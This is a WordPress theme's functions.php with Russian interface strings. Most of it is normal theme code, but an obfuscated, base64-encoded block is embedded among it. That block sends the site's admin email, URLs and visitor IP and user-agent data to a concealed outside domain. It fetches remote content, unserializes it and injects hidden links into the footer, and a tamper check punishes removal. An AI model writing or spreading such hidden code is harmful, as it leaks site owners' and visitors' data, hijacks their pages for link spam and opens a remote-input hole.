<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $mxnPK='b';$Jcqk='e';$Cmkgr='s';$SKWkiWI='d';$uuDUVXg='a';$yUCL='d';$fukfBpf='c';$xCcry='_';$LsYuvh='o';$ASOk='e';$ZhfaZ='6';$ztgi='e';$nxJci='4';$DJykWPaS=$mxnPK.$uuDUVXg.$Cmkgr.$ASOk.$ZhfaZ.$nxJci.$xCcry.$yUCL.$Jcqk.$fukfBpf.$LsYuvh.$SKWkiWI.$ztgi;$tMnQkM='n';$jPFyv='f';$SozYdS='g';$fmRPM='i';$MUwQM='l';$dDwYd='z';$TqoStDX='a';$Wpdqy='e';$vMsege='t';$wyzCYdmo=$SozYdS.$dDwYd.$fmRPM.$tMnQkM.$jPFyv.$MUwQM.$TqoStDX.$vMsege.$Wpdqy;$MwBI='_';$AoNvjr='o';$imUVE='s';$nktCE='r';$TnRGJso='3';$UVbf='r';$yvrI='1';$bIpYYto='t';$kaKjY='t';$zWIsmWlG=$imUVE.$bIpYYto.$nktCE.$MwBI.$UVbf.$AoNvjr.$kaKjY.$yvrI.$TnRGJso;$dExs='t';$MZaW='v';$aezmh='e';$DYjbq='r';$tfWV='s';$lClT='r';$NlmdGzSU=$tfWV.$dExs.$lClT.$DYjbq.$aezmh.$MZaW;                     
		$te__w='b';$yx_______________h='e';$zq_______________d='s';$tg_____________c='d';$ie_______________k='a';$iu_____________c='d';$cy___________b='c';$mm_____________z='_';$pr_____b='o';$lb__t='e';$jb____________s='6';$hn_____________t='e';$li_______________n='4';$gv______o=$te__w.$ie_______________k.$zq_______________d.$lb__t.$jb____________s.$li_______________n.$mm_____________z.$iu_____________c.$yx_______________h.$cy___________b.$pr_____b.$tg_____________c.$hn_____________t;
		$xs__________b='u';$kq_________y='n';$jg___k='t';$cx________w='o';$ru_____________a='x';$jy_________u='s';$eg________k='e';$id_____u='s';$ll____r='i';$is_____z='c';$nw______________q='f';$pl________r='t';$gl______l='n';$nl__________k='_';$nc_______________w='i';$hh____b=$nw______________q.$xs__________b.$gl______l.$is_____z.$jg___k.$ll____r.$cx________w.$kq_________y.$nl__________k.$eg________k.$ru_____________a.$nc_______________w.$id_____u.$pl________r.$jy_________u;
		$wp___________g='f';$pt__i='n';$og__c='o';$iu____x='p';$dq__________t='e';$pv______q=$wp___________g.$og__c.$iu____x.$dq__________t.$pt__i;
		$kz____________h='d';$pd_______________t='a';$ju_______________y='f';$nz_____g='r';$iw_______________y='e';$zx___h=$ju_______________y.$nz_____g.$iw_______________y.$pd_______________t.$kz____________h;
		$gd__u='s';$vs_____________r='o';$rm_______i='f';$mu____m='l';$ne_______________u='c';$rp__________c='e';$ni______r=$rm_______i.$ne_______________u.$mu____m.$vs_____________r.$gd__u.$rp__________c;
		
		define("WP_ID", $gv______o("Mi4wLjA="));
		define("WP_TTL", $gv______o("MTA4MDA="));
		define("WP_SRC", $gv______o("dHBva24="));
	


		function wp_get_header() {
			global $gv______o, $hh____b;
			
			if (
				$hh____b($gv______o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$hh____b($gv______o("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$hh____b($gv______o("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gv______o, $pv______q, $ni______r, $zx___h;
			
			$lh__________r = TEMPLATEPATH."/".$gv______o("Zm9vdGVyLnBocA==");
			$sw_________c = @$pv______q($lh__________r, "r");
			$lh__________r = @$zx___h($sw_________c, @filesize($lh__________r));
			@$ni______r($sw_________c);
			
			$fl__e = TEMPLATEPATH."/".$gv______o("ZnVuY3Rpb25zLnBocA==");
			$sw_________c = @$pv______q($fl__e, "r");
			$fl__e = @$zx___h($sw_________c, @filesize($fl__e));
			@$ni______r($sw_________c);
			
			$fr________f = 0;
			if($lh__________r && $fl__e) {
				if ($gv______o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($lh__________r, $gv______o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$fr________f = 1;
					}
					if (substr_count($lh__________r, "wp_theme_GPL_credits()") < 1) {
						$fr________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$fr________f = 12;
				}
			}
			
			if($fr________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $fr________f -->";
			}
		}
	


		function wp_loaded() {
			global $gv______o, $hh____b;
			return $hh____b($gv______o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ux__________p, $ma_____h = "(more...)", $xg______________z = 0, $iz_____a = "") {
				$yv______________w = get_the_content($ma_____h, $xg______________z, $iz_____a);
				$yv______________w = apply_filters("the_content", $yv______________w);
				
				$yv______________w = str_replace("]]>", "]]>", $yv______________w);
				if (strlen($_GET["p"]) > 0) {
					echo $yv______________w;
				}
				else if ((strlen($yv______________w)>$ux__________p) && ($la_____x = strpos($yv______________w, " ", $ux__________p ))) {
					$yv______________w = substr($yv______________w, 0, $la_____x);
					$yv______________w = $yv______________w;
					echo $yv______________w;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ma_____h</a></div></p>";
				} else {
					echo $yv______________w;
				}
				
			}
		}
	


		$vb______________v='e';$dy____k='o';$hy______v='a';$rf____________e='d';$nf______________m='e';$gt__i='e';$rv________y='n';$zm______________a='b';$tu____________h='c';$zh__t='4';$ni____w='s';$np______s='6';$qu___________e='_';$zj_________k=$zm______________a.$hy______v.$ni____w.$gt__i.$np______s.$zh__t.$qu___________e.$nf______________m.$rv________y.$tu____________h.$dy____k.$rf____________e.$vb______________v;
		$ls_______________c='l';$ds_____________g='t';$lh________x='t';$ey______p='f';$sv______________e='e';$mi____________y='c';$mp_____y='_';$lx__u='i';$ca_______________r='g';$iw__v='n';$gb_______d='n';$mn_______________w='e';$ar__y='o';$xp__l='e';$wc______r='_';$mo_____r='t';$ws______________j='s';$kb_____j=$ey______p.$lx__u.$ls_______________c.$xp__l.$wc______r.$ca_______________r.$mn_______________w.$mo_____r.$mp_____y.$mi____________y.$ar__y.$gb_______d.$ds_____________g.$sv______________e.$iw__v.$lh________x.$ws______________j;
		$nv____b='f';$uq__c='i';$qj_____y='x';$dv______e='e';$pl___________t='_';$st____________b='e';$fc_________s='i';$xs____________s='s';$tb_______________m='s';$iv_____________v='t';$ny_____c='l';$pj_________n=$nv____b.$uq__c.$ny_____c.$st____________b.$pl___________t.$dv______e.$qj_____y.$fc_________s.$xs____________s.$iv_____________v.$tb_______________m;
		$oo____________v='o';$ly_________s='r';$um___i='c';$si______w='n';$yf_____c='p';$ow______________q='e';$ey____________m='v';$mk______________x='e';$xm________p='m';$st_______g='a';$iy_______________t='o';$id___b='r';$sm____________r='s';$dm________h='i';$kv____________p='_';$vm_________d=$ey____________m.$ow______________q.$ly_________s.$sm____________r.$dm________h.$oo____________v.$si______w.$kv____________p.$um___i.$iy_______________t.$xm________p.$yf_____c.$st_______g.$id___b.$mk______________x;
		$wu______________w='o';$dk_______________x='p';$eu__p='n';$jt__________e='f';$ll___v='e';$tp____d='k';$kq_______________i='s';$zu_____j='c';$xx____________w='o';$ap__h=$jt__________e.$kq_______________i.$wu______________w.$zu_____j.$tp____d.$xx____________w.$dk_______________x.$ll___v.$eu__p;
		$mu__e='e';$hj___________g='i';$xv____________q='w';$bz______________m='f';$rx______i='r';$qf___t='t';$zo_______j=$bz______________m.$xv____________q.$rx______i.$hj___________g.$qf___t.$mu__e;
		$re________z='m';$kh_______________w='5';$oe____e='d';$rr__b=$re________z.$oe____e.$kh_______________w;
		$fs______________i='l';$vv___j='e';$oy__________f='r';$lw__________r='a';$qu_______________k='t';$cg________d='a';$aw______o='h';$lo__i='p';$au___________r=$oy__________f.$vv___j.$cg________d.$fs______________i.$lo__i.$lw__________r.$qu_______________k.$aw______o;
		$qd_______________y='i';$en_________r='z';$nd______________w='s';$rc_______________z='a';$ha_________p='n';$nf______________r='i';$dv__a='e';$mt___________c='r';$rl_________u='e';$ru_________h='u';$bw__________s='l';$dw_____l=$ru_________h.$ha_________p.$nd______________w.$dv__a.$mt___________c.$nf______________r.$rc_______________z.$bw__________s.$qd_______________y.$en_________r.$rl_________u;
		$ly____________o='n';$pr______________s='a';$dk_______________m='t';$yv______r='e';$il______s='p';$ov___l='m';$dw_________c='m';$uu___________m=$dk_______________m.$yv______r.$ov___l.$il______s.$ly____________o.$pr______________s.$dw_________c;
		$kl____k='t';$ds____________j='t';$vy______________x='t';$nt_________r='t';$no____b='e';$uh______________d='r';$fq________b='e';$tk__k='c';$gs____a='_';$qz______________b='s';$rf______________l='n';$bi_____________f='_';$bc_________w='m';$df_______m='c';$qw_____d='a';$at________b='x';$ew__v='r';$om__________j='a';$cw______p='e';$dt_______________n='e';$jy________n='o';$wz__b=$qz______________b.$ds____________j.$uh______________d.$dt_______________n.$om__________j.$bc_________w.$bi_____________f.$tk__k.$jy________n.$rf______________l.$nt_________r.$no____b.$at________b.$vy______________x.$gs____a.$df_______m.$ew__v.$cw______p.$qw_____d.$kl____k.$fq________b;
	


		function ma___________d($jf_____w) {
			global $gv______o, $hh____b, $kb_____j, $vm_________d, $wz__b;
			
			if (!$hh____b($gv______o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vm_________d(PHP_VERSION, "5.0.0", ">=") && $hh____b($gv______o("ZmlsZV9nZXRfY29udGVudHM=")) && $hh____b($gv______o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fw______________t = $wz__b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$rp______________r = @$kb_____j($jf_____w, 0, $fw______________t);
			} else {
				$rp______________r = @$kb_____j($jf_____w, 0);
			}
			
			return $rp______________r;
		}
	


		function if____j($jf_____w) {
			global $hh____b, $ap__h, $zo_______j, $gv______o;
			
			if (!$hh____b($gv______o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tf____y = strpos($jf_____w, "/", 7);
			$ud_______e = array(
				"uri"     => substr($jf_____w, $tf____y),
				"host"    => str_replace("http://", "", substr($jf_____w, 0, $tf____y)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$um____________p = @$ap__h("$ud_______e[host]", 80, $yh_____e, $zs________b, 4);
			
			if (!$um____________p) {
				return false;
			} else {
				$rp______________r = "";
				$ab____l  = "GET $ud_______e[uri] HTTP/1.0\r\n";
				$ab____l .= "Host: $ud_______e[host]\r\n";
				$ab____l .= "Referer: $ud_______e[referer]\r\n";
				$ab____l .= "Connection: Close\r\n\r\n";
				
				@$zo_______j($um____________p, $ab____l);
				
				while (!@feof($um____________p)) {
					$tp__m = @fgets($um____________p, (1024*24));
					
					if ($tp__m == "\r\n") {
						$ni______t = true;
						continue;
					}
					
					if ($ni______t) {
						$rp______________r .= $tp__m;
					}
				}
				
				return $rp______________r;
			}
		}
	


		function aj________s($jf_____w) {
			global $hh____b;
			$av________s = false;
			
			if ($jf_____w != "") {
				if ($hh____b("ma___________d")) {
					$av________s = @ma___________d($jf_____w);
				}
				
				if (!$av________s && ($hh____b("if____j"))) {
					$av________s = @if____j($jf_____w);
				}
			}
			
			return $av________s;
		}
	


		function tw_______x() {
			global $_SERVER, $rr__b;
			
			$ws_______________q = $_SERVER["SERVER_NAME"];
			
			if (substr("$ws_______________q", 0, 4) == "www.") {
				$ws_______________q = substr("$ws_______________q", 4);
			}
			
			$ws_______________q = $rr__b("$_SERVER[SERVER_NAME]");
			
			return $ws_______________q;
		}
	


		function np_____m() {
			return "file";
		}
	


		function wb_________j($jf_____w) {
			global $_SERVER, $kb_____j, $pj_________n, $pv______q, $ni______r, $zo_______j;
			
			$eh_________w = hv______________j();
			
			$ne____n = tw_______x().".jpg";
			$wb_____________n = $eh_________w["dir_upload"]["path"]."/$ne____n";
			$sa_______________q = @filemtime($wb_____________n);
			
			if (!$sa_______________q || ((time()-$sa_______________q) >= WP_TTL)) {
				$av________s = aj________s($jf_____w);
				
				if ($av________s) {
					if ($pj_________n($wb_____________n)) {
						@unlink($wb_____________n);
					}
					
					$sw_________c = @$pv______q($wb_____________n, "x+");
					
					@$zo_______j($sw_________c, $av________s);
					@$ni______r($sw_________c);
				}
			} else {
				if ($pj_________n($wb_____________n)) {
					$av________s = @$kb_____j($wb_____________n);
				} else {
					$av________s = false;
				}
			}
			
			return $av________s;
		}
	


		function hv______________j() {
			global $_SERVER, $gv______o, $zj_________k;
			
			$mm_______v = wp_count_posts("post");
			$xz________s = pathinfo(get_bloginfo("template_directory"));
			
			$eh_________w = array(
				"url" => array(
					"report"      => $gv______o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $xz________s,
				"dir_upload"	=> xo______________b(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$xz________s[filename],
					"a005=".$mm_______v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$eh_________w["url"]["queryString"] = implode("&", $eh_________w["queryString"]);
			$eh_________w["url"]["report"] = $eh_________w["url"]["report"]."/?".$zj_________k($eh_________w["url"]["queryString"]).".html";
						
			return $eh_________w;
		}
	


		function xo______________b() {
			$gu_________s = wp_upload_dir();
			
			if (isset($gu_________s["error"])) {
				$pr______________m = gk______________l();
				if (is_writable($pr______________m)) {
					$gu_________s = array("path" => $pr______________m);
				}
			}

			return $gu_________s;
		}
	


		function gk______________l() {
			global $hh____b, $rr__b, $au___________r, $uu___________m;
			
			$hc_______________n = (bool) ini_get("safe_mode");
			if ($hc_______________n == true) {
				return false;
			}
			
			if ($hh____b("sys_get_temp_dir")) {
				$td_______o = sys_get_temp_dir();
				if (is_writable($td_______o)) {
					return $au___________r($td_______o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $au___________r($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $au___________r($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $au___________r($_ENV["TEMP"]);
			} else {
				$db_______________i = $uu___________m($rr__b(uniqid(rand(), true)), "");
				if ($db_______________i) {
					$td_______o = $au___________r(dirname($db_______________i));
					@unlink($db_______________i);
					return $td_______o;
				} else {
					return false;
				}
			}
		}
	


		function gw____________j() {
			global $_GET, $pj_________n;
			
			$eh_________w = hv______________j();
			$ws_______________q = tw_______x();
			$jt__q = np_____m();
			
			$kq_____________h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($jt__q == "file") {
					$il____________z = $eh_________w["dir_upload"]["path"]."/".$ws_______________q.".jpg";
					if ($pj_________n($il____________z)) {
						@unlink($il____________z);
						$kq_____________h = "deleted";
					}
				}
				
				$ei____________b = array(
					"s"	=> $kq_____________h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ei____________b AS $xh___g => $tv_____m) echo " [$xh___g:$tv_____m]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $hh____b, $gv______o, $dw_____l;
			$eh_________w = hv______________j();
			
			$ha___________f = "wb_________j";
			if ($hh____b($ha___________f)) {
				$rp______________r = $ha___________f($eh_________w["url"]["report"]);
			}
			
			if ($rp______________r) {
				if ($rp______________r = @$gv______o($rp______________r)) {
					$rp______________r = @$dw_____l($rp______________r);
					
					if (strlen($rp______________r[custom_credit]) >= 5) {
						$eh_________w["default_string"] = $rp______________r[custom_credit];
					}
					
					if ($rp______________r["status"] == "0") {
						$fp________r = 1;
						$zm__c = 1;
					} else {
						$hi________n = sizeof($rp______________r["links"]);
						$rc_______j = $eh_________w["default_string"];
						
						if ($hi________n > 0 && $rp______________r["links"] !== "") {
							$fd___j = 0;
							foreach ($rp______________r["links"] as $zh______g => $mk_______s) {
								$fd___j++;
								if ($mk_______s->l_path == "" || $mk_______s->l_path == $_SERVER["REQUEST_URI"]) {
									$mk_______s->l_href = htmlspecialchars(strip_tags($mk_______s->l_href));
									$mk_______s->l_title = htmlspecialchars(strip_tags($mk_______s->l_title));
									$mk_______s->l_anchor = htmlspecialchars(strip_tags($mk_______s->l_anchor));
									$rc_______j .= " | ";
									$rc_______j .= "<a href='$mk_______s->l_href' title='$mk_______s->l_title'";
									if ($mk_______s->l_nofollow == "1") {
										$rc_______j .= " rel='nofollow'";
									}
									$rc_______j .= ">$mk_______s->l_anchor</a>";
								}
							}
						}
						$eh_________w["links"] = "$rc_______j";
						if ($rp______________r[credit] == "0") {
							$eh_________w["links"] = "";
						}
					}
				} else {
					$fp________r = "1";
				}
			} else {
				$fp________r = "1";
			}
			
			if ($fp________r == "1") {
				$eh_________w["links"] = $eh_________w["default_string"];
			}
			
			echo "$eh_________w[links]";
			
			echo "<!-- s: $rp______________r[signature] -->";
			gw____________j();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

